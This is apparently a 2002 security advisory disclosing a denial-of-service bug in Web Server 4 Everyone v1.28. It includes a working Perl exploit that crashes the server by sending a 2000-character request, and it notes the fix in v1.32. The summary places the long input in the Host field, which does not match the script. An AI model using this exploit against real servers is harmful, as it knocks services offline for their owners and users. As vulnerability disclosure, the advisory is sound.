Type

Denial of Service

Release Date

October 23, 2002

Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services. Web Server 4 Everyone is available for Microsoft Windows operating systems.

http://www.freeware.lt/Info/projects.php

Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000 characters "web4all.exe" just shuts down. This vulnerability also affects Web Server 4 Everyone versions prior to v1.28 for Microsoft Windows 2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains all "127.0.0.1", the server crashes. In case you send a request that size without adding the "Host:" there is no effect on running program. The Web server must be restarted to regain normal functionality.

Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

Vulnerable

Web Server 4 Everyone v1.28

Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net